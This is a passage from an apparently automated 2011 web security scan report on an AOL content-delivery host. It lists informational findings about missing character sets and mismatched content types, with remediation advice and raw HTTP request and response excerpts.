Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 16 Mar 2011 00:09:42 GMT
Content-Type: text/plain
Cache-Control: public, max-age=2592000
Expires: Sat, 04 Jun 2011 00:58:27 GMT
Date: Thu, 05 May 2011 00:58:27 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 108120

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
rue}/false, if window can be scrolled.
       gui: Additional pixels to add to the screen height (helps centering vertically)
       nu: if the name should be unique.
       
   Code History:
   
   2/9/2010 - David Artz (david.artz@corp.aol.com)
   Started development of library. Horay.
*/

(function($, window){
       
   var index = 0;
   
   $.openWindow = function( url, customOptions ) {
   
           // Set up default window features.
       var defaultOptions
...[SNIP]...
rue}/false, if window can be scrolled.
       gui: Additional pixels to add to the screen height (helps centering vertically)
       nu: if the name should be unique.
       
   Code History:
   
   2/9/2010 - David Artz (david.artz@corp.aol.com)
   Started development of library. Horay.
*/

(function($, window){
       
   var index = 0;
   
   $.openWindow = function( url, customOptions ) {
   
           // Set up default window features.
       var defaultOptions
...[SNIP]...

11. HTML does not specify charset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /lifestream/cdn/27.0.10/img/favicons/lifestream.ico

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /lifestream/cdn/27.0.10/img/favicons/lifestream.ico HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 2862
Cache-Control: max-age=2407192
Expires: Wed, 01 Jun 2011 21:39:06 GMT
Date: Thu, 05 May 2011 00:59:14 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 2862

..............(...6...........h...^......... .h.......(....... ................................................................................................ffffff`ffffffffffffffffffffffffffffffffff
...[SNIP]...

12. Content type incorrectly stated  previous
There are 3 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


12.1. http://o.aolcdn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://o.aolcdn.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Cache-Control: max-age=1209595
Expires: Thu, 19 May 2011 01:17:47 GMT
Date: Thu, 05 May 2011 01:17:52 GMT
Content-Length: 15
Connection: close
Vary: Accept-Encoding
X-N: S

File not found.

12.2. http://o.aolcdn.com/lifestream/cdn/27.0.10/img/favicons/lifestream.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://o.aolcdn.com
Path:   /lifestream/cdn/27.0.10/img/favicons/lifestream.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /lifestream/cdn/27.0.10/img/favicons/lifestream.ico HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 2862
Cache-Control: max-age=2407192
Expires: Wed, 01 Jun 2011 21:39:06 GMT
Date: Thu, 05 May 2011 00:59:14 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 2862

..............(...6...........h...^......... .h.......(....... ................................................................................................ffffff`ffffffffffffffffffffffffffffffffff
...[SNIP]...

12.3. http://o.aolcdn.com/os_merge/  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://o.aolcdn.com
Path:   /os_merge/

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.globalheader-1.4.js&file=/aol/jquery.globalsearchbox-1.2.js&file=/aol/jquery.openwindow-1.0.js&file=/aol/jquery.truncate-1.0.js&file=/aol/jquery.multiauth-1.0.min.js&file=/aol/jquery.openwindow-1.0.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&os=4 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/?icid=prodserv_mobile_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 16 Mar 2011 00:09:42 GMT
Content-Type: text/plain
Cache-Control: public, max-age=2592000
Expires: Sat, 04 Jun 2011 00:58:27 GMT
Date: Thu, 05 May 2011 00:58:27 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 108120

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

Report generated by XSS.CX at Thu May 05 02:15:50 CDT 2011.